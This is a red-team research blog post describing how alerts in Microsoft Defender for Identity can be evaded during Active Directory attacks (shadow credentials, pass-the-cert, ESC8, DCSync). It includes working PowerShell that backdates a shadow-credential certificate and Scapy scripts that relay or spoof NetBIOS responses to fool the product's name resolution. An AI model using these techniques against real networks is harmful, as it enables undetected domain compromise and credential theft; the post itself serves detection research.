Search

Microsoft Defender for Identity evasions in 2026 – Part I

Search

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026

Microsoft Defender for Identity evasions in 2026 – Part I

Introduction

When it comes to working with Microsoft Defender for Identity (DfI) from an offensive perspective, for instance during a red team assessment, research has already been conducted that highlights detection and evasion possibilities for different alerts. Research was previously done by Synacktiv, for example, for one of the pass-the-cert alerts (“Suspicious certificate usage over Kerberos protocol (PKINIT)”), multiple reconnaissance alerts, alerts for kerberoasting, AS-REP roasting and golden-ticket attacks.

The first part of this blogpost will summarize the research conducted at cirosec during the last few weeks related to DfI’s detection capabilities for high-impact attacks on Active Directory like shadow-credentials, pass-the-cert, ESC8 and DCSync and its respective evasion possibilities. Also, one of DfI’s main components called “Network Name Resolution” will be introduced, which is vulnerable to spoofing and relaying in DfI version 2.2, allowing multiple alerts to be evaded. Differentiation will be made and demonstrated between the DfI versions 2.2 and 3.0. 

The second part of the blogpost will show options for the blue teamer’s perspective and offer alternative possibilities to detect some of the attacks that were performed while using DfI evasion. If you are interested in this, the blogpost can be found here: Microsoft Defender for Identity evasions in 2026 – Part II

When talking about “evasion” in this blogpost, the term is defined in two ways. The first is when the detection logic for a part of an attack does not exist, which can be used to evade alerting DfI in general. The other definition of evasion is when performing an attack and actively misleading existing detection logics to evade the alert. 

Defender for Identity – architecture and overview

Microsoft DfI is one of the main components of the Microsoft Defender XDR solution besides other security products like Microsoft Defender for Endpoint and Defender for Office 365. DfI aims to help organizations to detect identity-related attacks across on-premises Active Directory. To accomplish that task, DfI collects different signals from the network through its agents, which are placed at the most critical Windows servers. The identity signals gathered by these agents are transferred into the Microsoft Defender XDR portal, where a correlation of these signals with data from other products like Defender for Endpoint happens, which can highlight ongoing attacks, starting from one endpoint, going across the domain against sensitive targets like domain controllers.

Figure 1: Microsoft Defender XDR (https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview)

The following Windows server rolls for DfI deployment are currently supported:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

Laboratory setup

Figure 2: Lab setup
Jakob Scholz

Consultant

Category
Date
Navigation

Looking at the initial lab setup, there are two domain controllers (DC) in the DfI versions 2.2 and 3.0, and a certificate authority (CA) is provided, too. Besides that, there are two clients: a domain-joined Windows workstation called PC02 and a Kali client that is not domain joined. Both clients represent an attacker on the network. The domain controllers with the two different versions of DfI allow to test against both of them.

The alerts covered in this blogpost don’t have a learning period, meaning there is no baseline that must be learned over a given time about what normal or unnormal network activities are. They behave on “static” conditions, making the alert work from the beginning of the setup. The information whether an alert has a learning period is shown at the DfI documentation here, at least for alerts classified as “DfI classic alerts”. Microsoft is moving the DfI classic alerts during an ongoing transition to “DfI XDR Alerts”, where less information is provided.

Another aspect to consider is the endpoint where attacks are carried out. Since Defender XDR correlates information between its different security products, it can even detect attacks that are evaded “DfI-wise”, for instance when the corresponding tool to perform an attack is recognized at an endpoint that is monitored through Defender for Endpoint. Since the focus was on DfI only, in the lab, PC02 is set up without Defender for Endpoint.

All of the results shown in this blogpost were generated between November 1, 2025 and February 1, 2026 and are based on the laboratory setup, which does not represent an enterprise environment. Therefore, DfI and the results may behave differently in a productive environment.

Shadow credentials

Attack overview

The shadow-credentials attack makes use of the msDS-KeyCredentialLink (KCL) attribute. This attribute can be used to store public keys and link them to the corresponding user or computer object, allowing for Kerberos authentication. When an attacker gets into a position where he can write the KCL attribute for another user or computer, he can essentially store his own public key there, making it possible to authenticate with the certificate as these entities. The authentication is done over the Kerberos extension for “Public Key Cryptography for initial authentication” (PKINIT) by presenting the certificate. The following weaknesses and evasion options occur in DfI versions 2.2 and 3.0.

General detection requirements

Talking about the alerting possibilities, there are two different alerts, and it must be distinguished between three different scenarios when looking at DfI’s detection capabilities. These scenarios differ regarding which entity is setting a shadow credential to which entity. The relevant difference in the entities is the target type, i.e. whether it’s a user object or a computer object.

A general requirement for DfI to identify a shadow-credentials attack is the correct auditing on the domain controllers. The event 5136 “A directory service object was modified” is required in order to make DfI capable of knowing that the KCL attribute, where the public key (shadow credential) is stored, was modified.

User to user

In the first scenario, a user is able to set a shadow credential for another user. There seems to be nearly no detection logic for this. A user can set a shadow credential for another user, except for the AD built-in administrator (S-1-5-<domain>-500), without raising the alert.

When setting a shadow credential (in this case for the built-in administrator (S-1-5-<domain>-500)), the first thing to happen is the event that occurs and is evaluated by DfI: 

Figure 3: Shadow credential – event 5136

If done for the built-in administrator, the alert for setting a shadow credential is raised:

Figure 4: Shadow credential alert: Suspected account takeover using shadow credentials

For all other kinds of user objects – even when high privileged through group membership – shadow credentials can be set without alerting DfI. In the tests, the users for which a shadow credential has been set were members of the following groups:

  • Administrators
  • Domain Admins
  • Enterprise Administrators
  • Group Policy Creator Owners
  • Schema Admins

User to computer

The second scenario to consider is writing a shadow credential from the user context to a computer object. Here, a distinction between sensitive and non-sensitive computer objects can be made. Computer objects seen as sensitive and instantly alerted when a shadow credential is set for them are Windows servers with the following rolls:

  • Active Directory – Domain Services (AD DS)
  • Active Directory – Certificate Services (AD CS)
  • Active Directory – Federation Services (AD FS)
  • Entra Connect server

This list is not exhaustive, and more server roles could be affected. But regular workstations that don’t hold a Windows server role seem to be classified as non-sensitive by Microsoft, and shadow credentials can be set without any alerting.

Computer to computer

Using authentication-coercions combined with NTLM relaying can be used by an attacker to authenticate as a foreign computer, allowing to write shadow credentials for the impersonated computer. This is because computer objects have the legitimate right to self-edit their KCL attribute.

In a coercion attack, a third-party machine account can be forced to authenticate via NTLM to a target of the attacker’s choosing. The attacker can forward this authentication information to another target via NTLM relaying and can thus impersonate the relayed machine account. Extensive information about these two attack techniques can be found in the following two blogposts: NTLM Relay and The Ultimate Guide to Windows Coercion Techniques in 2025.

The context here is different when compared to writing a shadow credential from a user identity to a computer: A machine account is writing the shadow credentials for itself, and there also exists a legitimate mechanism making use of it, which may be the reason why no shadow-credentials alert is raised when setting one for a sensitive computer object like a DC or a CA through NTLM relaying. Windows enables the possibility of “domain-joined device public key authentication”, which allows a computer to perform Kerberos authentication using key trust. When certain requirements are met like the device is running Credential Guard or TPM existence, the device can create a key pair and store the public key in its KCL attribute.

When performing the attack, it must be kept in mind that there are alerts in DfI targeting NTLM-relaying and authentication-coercions attacks. But as described there is no detection for the shadow-credentials attack itself, when talking about the NLTM relay scenario, where the identity of the computer object is used to write the shadow credential to that computer.

Shadow-credentials alert through PKINIT

The second alert that can be triggered in the context of a shadow-credentials attack is called “Shadow Credential Added to Account and used for Authentication”. This alert depends on another alert, namely the alert: “Suspicious certificate usage over Kerberos protocol (PKINIT)”. This alert is triggered when DfI detects that the usage of a certificate over the PKINIT extension is done by an attacker, namely as pass-the-cert attack, which is explained in the next section. When redeeming the set shadow credential to retrieve a Ticket Granting Ticket (TGT), which is done over the PKINIT extension of the Kerberos protocol, the set shadow credential can be detected retroactively by detecting the pass-the-cert attack. This extends the possibilities to detect shadow credentials set to user objects, which, as said previously, was nearly impossible. But the problem with this alert is that it depends on another alert, which makes it less robust. In summary, someone who can evade the alert for “Suspicious certificate usage over Kerberos protocol (PKINIT)” will automatically evade the alert for “Shadow Credential Added to Account and used for Authentication”.

Pass-the-cert attack

Attack overview

When having obtained a certificate through a shadow-credentials attack or an ADCS-ESC vulnerability, an attacker can use this certificate to request a TGT, authenticating him as the victim in whose context the certificate was created. The ADCS-ESC vulnerabilities refer to a range of misconfigurations possible for the Active Directory Certificate Services. See the whitepaper from Specter Ops Certified Pre-Owned for more information.

Reviewing existing evasion possibility

DfI comes with a detection logic for this attack, in which it tries to determine if an offensive tool like Rubeus was used to build the Authentication Service request (AS-REQ). The AS-REQ is the initial Kerberos message sent by a client to the Key Distribution Center (KDC) to request a TGT and initiate the authentication process. The detection is done by looking at the way how the ticket was requested. Synacktiv has done the research for the respective alert “Suspicious certificate usage over Kerberos protocol (PKINIT)” and found out that the indicators used by DfI to tell if an AS-REQ is built in a legitimate way or by an attacking tool are the eTypes. The eTypes are supported encryption types suggested by the client to encrypt the Kerberos tickets. Those suggested by Rubeus when building an AS-REQ are unique, making it easy for DfI to fingerprint that Rubeus was used.

The eTypes that are common in legitimate applications and can be used to bypass this alert are listed in Synacktiv’s blogpost here. The evasion was still working at the time of writing this article in March 2026 for DfI versions 2.2 and 3.0. The following Wireshark dump shows the AS-REQ when built with an adjusted version of Rubeus, using legitimate eTypes:

Figure 5: AS-REQ with legitimate eTypes

Taking a deeper look at the detection logic

Interestingly, this tool-based detection, where DfI tries to figure out if an AS-REQ is suspicious by inspecting the eTypes, is the second part of the detection chain for this alert. Before DfI investigates the suggested eTypes, it checks whether the creation time of the certificate is bigger or lower than two hours. This is done using the value NotBefore inside the certificate, which indicates the date on which the certificate becomes valid. The tool-based detection is only applied for certificates created during the last two hours. If the NotBefore value indicates that the certificate’s creation time is bigger than two hours, no further investigation is done by DfI, even if an unmodified version of Rubeus using the standard eTypes is used, which could be fingerprinted.

Shadow credentials and PKINIT

The awareness of that behaviour opens up another attack vector. If someone could modify the NotBefore value of a certificate that is used for Kerberos client authentication, they could bypass the whole detection chain. Certificates gained through ADCS-ESC-related attacks, e.g. ESC1, will be signed by the CA and cannot be modified without breaking the signature, which would result in the certificate getting rejected by the KDC when requesting the TGT. But for a self-signed certificate, which results from setting a shadow credential, the NotBefore value could be adjusted to a value in the past, make it look like the creation date was different. This could be done by using Michael Grafnetter’s DSInternals PowerShell module with the following code snippet from here. This makes it possible to write a shadow credential while having the possibility to modify the self-signed certificate. The following part of the script generates a self-signed certificate:

$upn = 'ADM@jsc.lab'
$ownerDN = 'CN=ADM,OU=Test_User,DC=jsc,DC=lab'
$userSid = 'S-1-5-21-1605340795-4164095229-358834758-7125'
$deviceID = (New-Guid)
$certificateSubject = '{0}/{1}/{2}' -f $userSid, $deviceID, $upn

$certificate = New-SelfSignedCertificate -Subject $certificateSubject `
      -KeyLength 2048 `
      -Provider 'Microsoft Strong Cryptographic Provider' `
      -CertStoreLocation Cert:\CurrentUser\My `
      -NotBefore (Get-Date).AddHours(-2)`
      -NotAfter (Get-Date).AddYears(30) `

-TextExtension '2.5.29.19={text}false', '2.5.29.37={text}1.3.6.1.4.1.311.20.2.2' `
      -SuppressOid '2.5.29.14' `
      -KeyUsage None `
      -KeyExportPolicy Exportable

The relevant part for the evasion is to set the NotBefore parameter to a value in the past:

-NotBefore (Get-Date).AddHours(-2)

After the creation of the certificate, a key credential link can be extracted from it, suitable to be set in the KCL attribute as a shadow credential:

$ngcKey = Get-ADKeyCredential -Certificate $certificate -DeviceId $deviceID -OwnerDN $ownerDN -CreationTime (Get-Date)

Set-ADObject -Identity $ngcKey.Owner -Add @{'msDS-KeyCredentialLink' = $ngcKey.ToDNWithBinary()}

As discussed in the section about shadow credentials, in part “Shadow-credentials alert through PKINIT”, the creation of a shadow credential can be detected through the subsequent authentication against the KDC when DfI classifies the authentication as malicious, which then also results in the alert for shadow credentials. As shown in this section, the pass-the-cert alert can also be bypassed by waiting two hours or making the certificate look like it’s older than two hours, but this only applies to self-signed certificates. Eventually, this makes it possible to evade the pass-the-cert alert when creating shadow credentials, which also results in evading the alert for setting the shadow credential.

Network Name Resolution (NNR)

Network Name Resolution (NNR) is a core component for several alerts to work, but is vulnerable to spoofing and relaying, making it possible to evade multiple alerts.

The DfI documentation describes NNR as follows:
Using NNR, Defender for Identity can correlate between raw activities (containing IP addresses), and the relevant computers involved in each activity. Based on the raw activities, Defender for Identity profiles entities, including computers, and generates security alerts for suspicious activities”.

NNR works by requesting the NetBIOS host and domain name as well as the DNS name from the IP address, from where a potential attack occurred, using three different primary methods:

  • NTLM over RPC (TCP port 135)
  • NetBIOS (UDP port 137)
  • Remote desktop protocol (TCP port 3389)

There also exists a secondary method, which is used if there is no response from any of the primary methods or if there’s a conflict in the responses received from two or more primary methods. The secondary option makes use of DNS. The DfI agent will make a reverse DNS lookup of the IP address to get the hostname of the machine.

By using these methods, DfI can tell the origin of the suspicious traffic and map it to a computer hostname, making it possible to distinguish between an attack or legitimate behavior. How knowing the hostname of the suspicious computer helps DfI determine if an attack occurred is explained in the next section using one alert whose detection logic is based on NNR.

NNR in action: Suspected suspicious Kerberos ticket request

Using an example to see the inner working of NNR and its weakness, it can be continued to obtain TGTs by using certificates. While having already discussed the alert “Suspicious certificate usage over Kerberos protocol (PKINIT)”, there is another alert when trying to request a TGT by offering a certificate via PKINIT. This alert is called “Suspected suspicious Kerberos ticket request” and has an interesting scope. The research has shown that it is only applied when trying to authenticate as a domain controller machine account using a certificate.

For this example, it is assumed that the adversary is on PC02.jsc.lab (172.16.94.11) and has managed to get a certificate valid for DC02 allowing Kerberos client authentication, for instance through shadow credentials or an ADCS-ESC vulnerability. When the attacker from PC02 uses the certificate to authenticate as DC02$ against DC01.jsc.lab, the DfI agent at DC01 will send NNR requests to the source IP address from which the AS-REQ for DC02 request originated, which is 172.16.94.11. This is done to determine if DC02 is actually at this IP address. The described flow is illustrated in the following image:

Figure 6: NNR flow

The only information the DfI agent has before starting the investigation using NNR is an AS-REQ requesting a TGT for DC02 and the source IP address of the suspicious machine. The AS-REQ provides a valid certificate with the subject DC02$, indicating that the certificate belongs to DC02$. The requester has also sent the signed timestamp, giving proof of possession of the private key.

Figure 7: AS-REQ DC02$

Therefore, it makes sense to have a detection logic for that kind of request. An AS-REQ for a domain controller machine account must originate from the source IP address of the respective domain controller, in the case of Kerberos authentication. If a TGT for a domain controller machine account is requested from a machine that is not the domain controller itself, as indicated by network attributes such as IP address and hostname, this strongly indicates that an adversary has obtained a valid certificate, which would be explainable through attacks like shadow-credentials or ADCS-ESC-related attacks.

Inspection of NNR primary methods

Continuing with the example from above, specific actions are happening on DC01 and PC02 when the attacker performs an AS-REQ for DC02 against the KDC on DC01 starting from PC02. The DfI agent’s reaction on DC01 (172.16.94.1) to the incoming AS-REQ is inspected using Procmon:

Figure 8: DfI sensor process performing NNR

“Microsoft.Tri.Sensor.exe” is the relevant process of DfI, which performs the NNR. The first two entries 1.) and 2.) are requests and responses to PC02 using NetBIOS – UDP port 137. Entries 3.), 4.), 5.) and 6.) are responsible for the NNR method using the endpoint mapper – TCP port 135. Entry 7.) uses RDP – TCP port 3389.  

When monitoring PC02, the incoming NNR requests can be noticed, where each source port can be mapped to the source ports in figure 8:

Figure 9: NBNS node status request

The NetBIOS request from the DfI agent to port 137 on PC02 can be noticed in figure 9. Furthermore, we can see the request at the DCE/RPC endpoint mapper on TCP port 135:

Figure 10: NTLM over RPC

Eventually, there is the connection to RDP on TCP port 3389:

Figure 11: RDP

NNR method: NetBIOS node status request

The NetBIOS request done by DfI is a so-called NetBIOS node status request, which is a unicast request to retrieve NetBIOS-related information about an endpoint. The NetBIOS node status response from PC02 contains information about its NetBIOS hostname, the NetBIOS domain name and the NetBIOS service type. The hostname and domain name are the relevant information which is used by the DfI agent to answer the previous question of whether the computer with IP address 172.16.91.11 (PC02) is in fact DC02. Since PC02 is not DC02, the NetBIOS-related information from PC02 will lead DfI to alert this attack.

Figure 12: NetBIOS node status response (PC02)

The three highlighted areas in figure 12 contain the discussed information that is essential for the detection logic. Each entry corresponds to a registered name, which are three in total. The first name “JSC<00> (Workstation/Redirector)” states that the NetBIOS domain name is “JSC”, and the service type is 0x00, which represents a workstation. The two other names just differ in the service types, while 0x20 indicates a file service. “PC02<00> (Workstation/Redirector)” indicates the NetBIOS hostname is “PC02”.

The NetBIOS request generated by DfI can also be triggered by using the native Windows tool nbtstat by using nbtstat -A <ip>. The result can be seen in the following image, containing the same information as when inspecting the NetBIOS request through Wireshark:

Figure 13: NetBIOS node status request using nbtstat

The alert can even be inspected before appearing in the Defender XDR portal, by looking into the local logging files. These are stored at “C:\Program Files\Azure Advanced Threat Protection Sensor\2.255.XXXXX.XXXXX\Logs\Microsoft.Tri.Sensor.log” at the DC. The collected information can be found in the log file:

Figure 14: Alert: “Suspected suspicious Kerberos ticket request” in logs

The log file indicates an alert triggered by the use of a certificate for one machine account on another computer. The highlighted items “CertificateSubject=DC02$” and “SourceAccountName=jsc.lab\DC02$” is the information extracted from the AS-REQ and the provided certificate. “SourceComputerName=DomainName=JSC Name=PC02” is obtained from the NetBIOS node status response. These are the key values for the detection logic. If the NetBIOS hostname and NetBIOS domain name don’t match to the certificate subject and account name, like in this case, the alert is raised. If the values match, no alert will be raised.

Evasion using NetBIOS

Since the detection logic for the alert “Suspected suspicious Kerberos ticket request” was uncovered, evasion possibilities can be considered.

There are two possibilities to evade the alert or more generally, to manipulate NNR. The first is to spoof a NetBIOS response to the DfI agent directly by specifying the needed NetBIOS information and answering the NetBIOS node status request. The other option is to take the incoming NetBIOS request from the DfI agent, relay it to the desired target and relay the response back to the DfI agent.

Relaying the NetBIOS node status request

To understand the relaying of the NetBIOS request, refer to the following two diagrams:

Figure 15: AS-REQ
Figure 16: Relaying of NetBIOS node status request/response

After the request of the TGT (1 & 2), DfI will start using NNR and asking the sender for its NetBIOS node status (3). A malicious actor can relay the NetBIOS request to the target to which that TGT would belong, which is DC02 (4) in the example. The response from DC02 can be relayed back over PC02 to DC01 (6). This will result in evading the detection since the AS-REQ and certificate indicates DC02$ as the subject and the NetBIOS information from the machine that performed the AS-REQ seems to match to DC02, from the perspective of the DfI agent on DC01.

The relaying of the NetBIOS method can be performed in a PoC using the Python library Scapy.

def relay_nbns_node_status_request(pkt):
   dc01_ip = "172.16.94.1"
   dc02_ip = "172.16.94.4"
   udp_src_port = pkt[UDP].sport
   dc01_nbns_node_status_request = pkt[NBNSHeader]

    dc02_nbns_node_status_response =
   sr1(IP(dst=dc02_ip)/UDP()/dc01_nbns_node_status_request)

   dc02_nbns_node_status_response = dc02_nbns_node_status_response[NBNSHeader]
   send(IP(dst=dc01_ip)/UDP(dport=udp_src_port)/dc02_nbns_node_status_response)

The function takes a network package as argument (pkt), which must be sniffed before; this can be done with Scapy. In the first block, the relevant IP addresses and the UDP source port from which the package originated are saved as well as the extraction of the NetBIOS node status request from DC01.

The second block builds the NetBIOS node status request for DC02, sends it to DC02 and also receives the response – the NetBIOS node status response. The last block builds the response to DC01 and sends it.

When using nbtstat on DC01 again to retrieve the NetBIOS information from PC02, it can be seen that it was possible to successfully tamper with the NetBIOS node status request. PC02 (172.16.94.11) is now appearing to be DC02.

Figure 17: Tampered NetBIOS node status response PC02 (relayed)

This way to perform the evasion using relaying has some advantages, but also certain disadvantages when compared with the second method, which will be presented next.

First of all, doing the evasion this way is fast and straightforward, because it’s not necessary to care about the different values like NetBIOS hostname and NetBIOS domain name since the NetBIOS node request is directly answered by the correct target. This also comes with the advantage that the NetBIOS node response is 100 % accurate compared to when manually spoofing a NetBIOS node response, where values that are not important to the evasion may be ignored or overlooked, potentially generating indicators of compromise (IOCs). The above image shows that one example is the MAC address. While the MAC address is not critical to DfI’s detection logic, it can be ignored when manually crafting a NetBIOS node status response but theoretically leads to IOCs for malicious actions.

The biggest disadvantage for this approach is the fact that it depends on the availability of another target’s (in this case another DC’s) port, here UDP 137, to retrieve it’s NetBIOS information. When it’s not possible to reach the target on UDP port 137, for instance due to firewalling or network issues, no NetBIOS information can be relayed back to the initial requester, resulting in failing the evasion. Therefore, the manual crafting of NetBIOS node status responses is discussed, too.

Spoofing the NetBIOS node status response

While it can be differentiated technically between relaying a request to receive a correct response or just building the correct response oneself, it’s essentially resulting in the same: a spoofed response is sent. In this case, it’s discussed how to build a spoofed NetBIOS node response to DfI with the relevant information. This can also be done by using Scapy:

def send_spoofed_nbns_node_status_response(pkt):
sample_nbns_node_status_response = (rdpcap(r"PC02_nbns_node_status_response.pcap"))[0]
   udp_src_port = pkt[UDP].sport
   transaction_id = pkt[UDP][NBNSHeader].NAME_TRN_ID

spoofed_nbns_node_status_response = sample_nbns_node_status_response[NBNSHeader]
spoofed_nbns_node_status_response.NAME_TRN_ID = transaction_id
  spoofed_netbios_host_name = 'DC02'.ljust(15, " ")
   spoofed_nebtios_domain_name = 'JSC'.ljust(15, " ")

for index, nbns_entry in enumerate(spoofed_nbns_node_status_response.NODE_NAME):
       if nbns_entry.NAME_FLAGS == 0x04: # UNIQUE
spoofed_nbns_node_status_response.NODE_NAME[index].NETBIOS_NAME = spoofed_netbios_host_name
       elif nbns_entry.NAME_FLAGS == 0x84: # GROUP
spoofed_nbns_node_status_response.NODE_NAME[index].NETBIOS_NAME = spoofed_nebtios_domain_name

    send(IP(dst=dfi_agent_ip)/UDP(dport=udp_src_port)/
   spoofed_nbns_node_status_response)

As a basis, a sample of a NetBIOS node status response from PC02 was captured and saved as PCAP file. This file can be loaded and used for further processing. Besides, the UDP source port and the transaction ID of the incoming request are saved.

In the second block, the node status response is adjusted with the correct transaction ID, and the spoofed NetBIOS names are prepared. The NetBIOS names are specified as 16 bytes fixed length, padded with spaces, while the last byte is the suffix for the service type that is already set in the sample. The last block adjusts the NetBIOS node status response to use the spoofed NetBIOS names.

The result can be seen in the comparison displayed below, while the left image equals the original NetBIOS node status from PC02 and the right image shows the spoofed response that was generated with the script. The NetBIOS domain name stays “JSC” since it was already set.

Figure 18: Original node status PC02
Figure 19: Spoofed node status PC02

When inspecting the result of the spoofed response, differences can be noticed between the spoofed and the relayed attempt. When the relaying attempt is used, there is one more registered NetBIOS name. The entry “JSC <1C> GROUP Registered” is missing when spoofing the DC02 node status response, like it was done with the previous script. The missing entry with the service type 1C is indicating that this node is a domain controller inside the domain (JSC). While this seems to be a relevant criterion to DfI, when it comes to telling whether some requests originate from a domain controller, like it’s the case for the alert: “Suspected suspicious Kerberos ticket request”, it is not. The alert has the limited scope to identify a suspicious request for a TGT domain controller machine account that was not requested from the DC itself. It is not relevant whether the node is registered as domain controller inside the domain; the evasion is working by just spoofing the correct NetBIOS hostname and domain name. This may be explainable through the fact that the two other NNR methods cannot indicate whether one endpoint is registered as a domain controller by a raw, single value, like it’s the case for the NetBIOS node status. Additionally, the detection logic is designed to work with just one NNR method active in the environment, which means that every method must be able to detect all threats independently of the other NNR methods, but with the same reliability.

Figure 20: Tampered NetBIOS node status response PC02 (relayed)

Additional considerations when evading NNR

Windows endpoint considerations

To perform an evasion when working with NNR, there are two more things to consider than just spoofing the NetBIOS node status response. DfI mustn’t receive any NNR responses from the actual operating system (OS) by the machine used by the attacker for the attack and the evasion. When performing the evasion technique with the provided scripts, there would be a race condition between the script-generated, spoofed response and the OS-generated legitimate response. To avoid the race condition, it’s possible to block incoming traffic to the destination ports used for NNR on the attacker machine. The Windows firewall allows to create rules for incoming traffic, but it must be noted that local administrator privileges are required to modify the Windows firewall. Scapy works with using Npcap, allowing to sniff and inject traffic onto the network interface, independently from the Windows OS and therefore the firewall, too. Using that approach, it’s possible to send spoofed NNR responses to the DfI agent while supressing the Windows OS from answering the NNR requests.

The other thing to think of are the two other NNR methods. When inspecting the NNR documentation, it can be seen that it’s recommended when configuring DfI to open up at least one of the related ports on all devices in the environment to allow for at least one primary method to work. This means DfI can perform detection when only one of the NNR methods is answered, which allows to just respond to the NetBIOS method, while ignoring the two others. This can also be done by blocking the required ports on the attacker machine.  

Cached NNR responses by Defender for Identity

Another thing to consider when attempting to evade NNR-based detection is the caching of NNR responses. DfI agents in sensor version 2.2 frequently ask domain-joined devices for their hostnames with the described NNR requests and cache this information, independently of whether suspicious traffic was received from the devices. If the DfI agent is holding newly cached NNR information about one machine and a suspected attack from this machine happens, the cached information can be used, instead of asking the machine directly. This comes with a problem when trying to evade an alert that uses NNR. If the DfI agent collected the hostname about the machine right before the attack is performed, the attacker machine may not be asked for its hostname, making the spoofing of the responses impossible, and the evasion would fail. Therefore, the script for spoofing the NNR responses must be running on the machine, and it must be waited until the DfI agent automatically asks for NNR information. Spoofed responses will be sent, effectively poisoning the DfI cache with spoofed information. Now the attack with the respective NNR detection logic can be performed, and two scenarios can happen: The DfI agent uses the spoofed, cached information or the attacker machine is asked for its NNR information and spoofed responses can be sent. Both will result in successfully evading the alert.

Indicators of Defender for Identity 2.2 usage in the environment

It can be attempted to fingerprint DfI in version 2.2 when having control over a domain-joined machine. As described above, DfI frequently queries domain-joined devices in the domain for their hostnames using NNR requests. Having the access required to sniff the network interface on a compromised host, it can be looked for the three primary methods of NRR: NetBIOS node status request, RDP and NTLM over RPC originating from a Windows server that could run DfI. Specific characteristics about the RDP and NTLM over RPC messages, which help to identify DfI 2.2, are described in the section “Reviewing the remaining NNR methods”. The certainty with which it can be said that a Windows server is running DfI v.2.2 depends on the number of related ports that are open on the attacker machine and on the network. The three NNR requests are sent together as a bundle. If all three ports are open, essentially all three messages arrive as a “bundle”, presenting a high likelihood that it’s from DfI. If we assume that two ports are closed and just UDP port 137 is open, it’s not possible to say with high certainty that this request is from DfI, when just receiving a single NetBIOS node status request.

ADCS-ESC8

DfI also comes with an alert for the ACDS-ESC8 attack. To detect this attack, it’s required that DfI is installed on the related CA.

Attack overview

This attack technique is aimed against the Active Directory Certificate Services (AD CS), allowing an attacker who is capable of performing a NLTM-relaying attack of a machine account to obtain a certificate valid to be used for Kerberos authentication in the name of the impersonated machine account. Additionally, some requirements must be met to make the CA’s web enrolment endpoint vulnerable to this attack. For further information check out the white paper from Specter Ops: Certified Pre-Owned: Abusing Active Directory Certificate Services.

This time, the actor is on kali.jsc.lab (172.16.94.13) performing the attack. The attack scenario looks like this:

Figure 21: ADCS-ESC8 simplified overview

Note that the ESC8 attack consists of using an authentication-coercion attack and NTLM relay, which is only represented in a simplified way in this image. What happens effectively is the following:

  • The Kali machine forces the DC01 machine account to authenticate at the Kali machine using NTLM (1)
  • In step (2) and (3), Kali performs the authentication via NTLM as DC01 against the CA
  • In step (4), the attacker obtains a certificate in the name of DC01, which allows for later Kerberos authentication

Evading ESC8 using NNR

The detection logic for the alert also depends on the NNR feature. This time, the DfI agent installed on the CA02 is responsible for performing the detection. The question to be answered is whether the requestor of the certificate for DC01 is indeed DC01. The issuing of the certificate for DC01$ happened between the Kali machine and the CA. Therefore, DfI will investigate if the IP address 172.16.94.13 belongs to DC01, using NNR.

Assuming no evasion technique is used and the Kali machine responds to the NNR requests, the flow would look as follows:

Figure 22: NNR flow after ESC8

Using the previously described evasion technique for NNR, the ESC8 alert “Suspicious Domain Controller certificate request (ESC8)” can be evaded by pretending to be the machine account in whose context the certificate was requested. In this example, that machine account is DC01. While using the ESC8 attack, the detection capabilities for different coercion attacks and NTLM relay must be considered, too.

Comparing NNR usage for ESC8 to NTLM-relayed shadow credentials

An interesting inconsistent usage of the NNR feature by DfI can be observed when comparing ESC8 with relayed shadow credentials. In the shadow credentials section, in part “Computer to computer”, it was said that shadow credentials can be set for machine accounts without triggering an alert when this is done over a NTLM-relayed connection. The question arising in the shadow-credentials scenario is the same as in the ESC8: “Is the request performed by the actual machine associated with the machine account, or by a different machine that successfully authenticated as that machine account via NTLM”. But for relayed shadow credentials, no NNR requests are sent to the machine from which the traffic for setting the shadow credential originated.

DCSync

Attack overview

DCSync attack refer to an attacker who has control over an entity that has the high privileges in the domain necessary to replicate parts of the domain. When having access to such an entity, which could be a domain controller machine account or a high privileged service account with the replication rights or a domain administrator, an attacker can obtain sensitive data. For example, he could receive the AES key of the krbtgt user, which is used to encrypt and sign TGTs inside the domain, allowing him to create golden tickets and persist himself.

The alert for DCSync is also vulnerable to spoofing NNR responses since its detection logic builds on NNR. But for the evasion possibilities, it must be distinct from the identity that performs the DCSync. While domain controllers always have the replications right, user and service accounts can also be permitted.

Evading DCSync alert using domain controller machine account

When performing DCSync attacks using the identity of a domain controller machine account, the detection is the same as for the alert “Suspected suspicious Kerberos ticket request” and the ESC8 alert, and the evasion works in the same way, too. If the attacker has obtained a TGT for DC02, the DCSync attack can be performed against DC01, answering the incoming NNR requests, pretending to be DC02 and vice versa.

Considerations for evading DCSync alert using service and user accounts

While detection and evasion of DCSync attack using domain controller machine account is reliable, it cannot be definitely tested for service and user accounts as the detection by DfI is unreliable for those types of accounts.

But there is a theory of one detection criterion that is used for these accounts. When successfully triggering DfI for a DCSync alert using a self-created, non-default service or user account, the alert appears in the portal with the following information: “PC02 is not a recognized domain controller” (see figure 23). The attacks in the tests were performed with the identities of a self-created service account and a user account holding the replication rights and were done from PC02 against DC01. Adding the information that NNR requests are also made to machines from which DCSync attacks originate when using service or user accounts, it can be suspected that originating from any domain controller may be considered legitimate when performing a DCSync attack. Unfortunately, the detection of DCSync attacks with these accounts is unreliable, making it hard to tell if an evasion is successfully performed.

Figure 23: DCSync alert with service account

Reviewing the remaining NNR methods

The focus in this blogpost is on the NNR method using NetBIOS. However, if UDP port 137 is not configured to be open on the network, NetBIOS cannot be used to evade the respective alerts, since the NetBIOS node request will never be received by the attacker and therefore, cannot be answered with a spoofed response. Consequently, the other two methods must also be inspected.

Remote desktop protocol (RDP)

Another primary method is the usage of RDP. According to documentation, “RDP (TCP port 3389) – only the first packet of Client hello” is used to perform the name resolution. No RDP connection is established; the DfI agent initiates a TLS handshake based on port 3389, acting as a client to the suspected attacker machine and sending the “Client Hello” message. If the machine is configured to listen on TCP port 3389, it will respond with the “Server Hello” message. Part of that message is the machine’s RDP certificate with extended key usage for server authentication, allowing to authenticate against the client. The RDP certificate used for this purpose can be found at the local machine’s certificate store at “cert:\LocalMachine\Remote Desktop”. By default, this is an auto-generated self-signed certificate, using the FQDN of the machine as subject and issuer. To get information related to the domain- and hostname from one machine in order to compare it with the information provided in the discussed attacks like pass-the-cert for domain controller, ESC8 or DCSync, the same technique is used as it was done with NetBIOS. This time, DNS-related information is obtained, using that NNR technique. In this case, the subject of the provided certificate is used to resolve the IP address from a potential attacker’s machine to domain and hostnames.

DfI accepts the certificate to gain the FQDN of the machine even if it is self-signed, which provides the possibility to answer to the NNR request with a spoofed, self-signed certificate. This request could also be relayed to the desired target by the attacker but requires having the RDP port open.  

